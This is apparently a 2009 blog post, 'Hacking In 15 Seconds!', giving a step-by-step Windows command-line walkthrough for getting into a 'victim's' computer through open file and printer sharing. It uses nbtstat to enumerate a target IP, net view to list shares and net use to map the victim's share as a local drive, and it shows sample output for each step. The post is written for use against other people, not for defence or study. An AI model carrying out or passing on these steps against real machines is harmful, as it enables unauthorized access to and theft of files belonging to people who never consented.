Hacking In 15 Seconds!





Wednesday, August 19, 2009 Leave a Comment

Hacking In 15 Seconds!

If your victim possess certain security flaws then her system can be broken into in less that 15 seconds.

This is how : -

Click “Start -> Run -> cmd”

Type the following at the Dos Prompt

Code:

Nbtstat -A

[e.g: nbtstat -A 207.175.1.1]

This will give you a read out that looks like this

Code:



NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
————————————
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1e> GROUP Registered
WORK <1d> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
____________________________________

The numbers in the <> are hex code values. What we are

interested in is the “Hex Code- number of <20>.

A hex code of <20> means you have file and printer sharing turned on.

Next step is to find out what is being shared. This is how : -

Code:
Net view \\

[e.g : net view \\207.175.1.1]

You will then get a response that looks something like this.
Code:

Shared resources at \\ip_address
Sharename Type Comment
______________________
MY DOCUMENTS Disk
TEMP Disk
______________________

(The command was completed successfully.)

Code:
Net use x: \\\temp

[e.g : net use x: \\207.175.1.1\temp]

If all goes well for you, you will then get a response of

Code:
(The command was completed successfully.)

Open my computer you will see your victim’s temp folder there



Share this Post :
| More

0 comments »

Leave your response!

Add your comment below,or trackback from your own site.

Be nice. Keep it clean. Stay on topic. No spam.